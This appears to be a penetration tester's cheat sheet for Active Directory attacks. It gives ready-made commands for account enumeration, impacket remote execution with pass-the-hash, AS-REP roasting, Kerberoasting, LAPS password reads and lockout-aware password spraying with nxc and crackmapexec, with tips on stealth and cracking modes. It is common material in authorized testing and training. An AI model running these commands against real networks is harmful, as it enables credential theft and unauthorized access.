Enumeration

Kerbrute / ldapsearch - Enumerating valid AD user accounts

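kerbrute userenum -d <domain> --dc <ip> users.txt
	# Ensure that users.txt contains a list of potential usernames
	# userenum sends AS-REQs with no password, so it does not count against the lockout policy;
	# a valid user is recognised by the KDC answering "pre-authentication required" instead of "principal unknown"
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)"
	# -x with no -D/-w is an anonymous (null) bind, which most DCs reject; once you hold credentials bind with them:
	#   ldapsearch -x -D '<username>@<domain>' -w '<password>' -b "DC=<>,DC=<>" -H "ldaps://<IP>" "(objectclass=*)"
	# use ldaps:// (or -ZZ for StartTLS) for an authenticated bind, otherwise the bind password crosses the wire in cleartext
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}'
ldapsearch -v -x -b "DC=<>,DC=<>" -H "ldap://<IP>" "(objectclass=*)" | grep sAMAccountName: | awk '{print $2}' > users.txt
	# '>' overwrites an existing users.txt
	# sAMAccountName is also set on groups and computer accounts (trailing '$'); use the filter
	# "(&(objectclass=user)(!(objectclass=computer)))" in place of "(objectclass=*)" to keep only user accounts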

Impacket

Remote Access with:
 smb service -
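  # all three need local-admin rights on the target and are logged on the host; choose by footprint
  impacket-psexec <domain>/<compromised username>:<password>@<IP>
  	# uploads a service binary to ADMIN$ and registers a service -> loudest, leaves a file and a service-install event
  impacket-smbexec <domain>/<compromised username>:<password>@<IP>
  	# drops no binary but creates a throw-away service per command through the service manager
  impacket-wmiexec <domain>/<compromised username>:<password>@<IP>
  	# runs commands over WMI (DCOM, TCP/135 + dynamic port) and reads output back via ADMIN$ -> usually the quietest
  # pass-the-hash for any of them: replace ':<password>' with -hashes :<NT hash>
  #   impacket-wmiexec -hashes :<NT hash> <domain>/<compromised username>@<IP>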

 sql service -
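  impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
  	# -windows-auth logs in with the domain account (NTLM/Kerberos) rather than a SQL login; omit it for a native SQL login such as 'sa'
  	# default instance is TCP/1433; add -port <n> for a named instance on another port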
AS-REP Roasting
	Kali:  impacket-GetNPUsers -request -dc-ip <Domain Controller IP> -outputfile <output file name> <domain>/<compromised username>
		# with a valid account this looks up users flagged "Do not require Kerberos preauthentication" over LDAP and requests their AS-REP
		# with no credentials use: impacket-GetNPUsers -no-pass -usersfile users.txt -dc-ip <Domain Controller IP> <domain>/  (blind per-user requests, noisier)
		# crack the output with hashcat -m 18200
	Windows: .\Rubeus.exe asreproast /outfile:<output filename> /nowrap
		# runs in the context of the current logon; /nowrap keeps each hash on one line for hashcat
	
Kerberoasting	
	Kali:  impacket-GetUserSPNs -request -dc-ip <Domain Controller IP>  -outputfile <output file name> <domain>/<compromised username>
		# any valid domain account can request a TGS for every user account that has an SPN; the ticket is encrypted with the service account's password hash
		# crack with hashcat -m 13100 for RC4 (etype 23); AES-only tickets (etype 17/18) need -m 19600/19700 and are far slower to crack
	Windows: .\Rubeus.exe kerberoast /outfile:<output filename> /nowrap

LAPS Password
	Kali: impacket-GetLAPSPassword -dc-ip <ip> <domain>/<username>:<password>
		# Discovered password belongs to the LAPS-managed local administrator account of the target machine
		# the DC only returns it if <username> has read rights on the LAPS password attribute (ms-Mcs-AdmPwd for legacy LAPS);
		# an empty result usually means missing rights rather than "no LAPS" - check who is delegated read access on the computer OU

nxc

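nxc smb <ip>
	# banner shows hostname, domain, OS build and SMB signing state; signing:False makes the host an NTLM-relay target
nxc smb <ip> --pass-pol
	# read the lockout threshold and observation window BEFORE spraying with the command below
nxc smb <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success
	# Ensure that users.txt contains a list of potential usernames
	# a file path given to -u/-p is treated as a list; every failed login counts toward the lockout threshold,
	# so spray ONE password per observation window rather than a whole password list against all users
	# --continue-on-success keeps testing the remaining pairs after the first valid hit instead of stopping
	# add --local-auth to test local (non-domain) accounts; with a valid pair, --shares / --users lists shares and domain users
	
nxc winrm <ip>
	# To verify if PSRemoting is enabled
nxc winrm <ip> -d <domain name> -u <username or username list> -H '<hash or hash list>' --continue-on-success
	# To verify if supplied credentials can be used for evil-winrm connection
	# -H takes NT hashes (pass-the-hash); use -p for cleartext passwords as in the smb example
	# "(Pwn3d!)" on winrm means the account may log in over WinRM (local admin or Remote Management Users)
	
nxc rdp <ip>
nxc rdp <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success
	# "(Pwn3d!)" here means interactive RDP logon is allowed for that account; RDP failures count toward lockout as well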

crackmapexec

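# crackmapexec is no longer actively maintained; its successor nxc (NetExec) accepts the same syntax
crackmapexec smb <ip>
crackmapexec smb <ip> --pass-pol
	# read the lockout threshold and observation window BEFORE spraying with the command below
crackmapexec smb <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success
	# Ensure that users.txt contains a list of potential usernames 
	# a file path given to -u/-p is treated as a list; each failed login counts toward lockout - spray one password per observation window
	
crackmapexec winrm <ip>
	# To verify if PSRemoting is enabled
crackmapexec winrm <ip> -d <domain name> -u <username or username list> -H '<hash or hash list>' --continue-on-success
	# To verify if supplied credentials can be used for evil-winrm connection
	# -H expects NT hashes (pass-the-hash), not passwords; use -p '<password or password list>' for cleartext credentials
	
crackmapexec rdp <ip>
crackmapexec rdp <ip> -d <domain name> -u <username or username list> -p '<password or password list>' --continue-on-success
	# RDP failures count toward lockout as well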
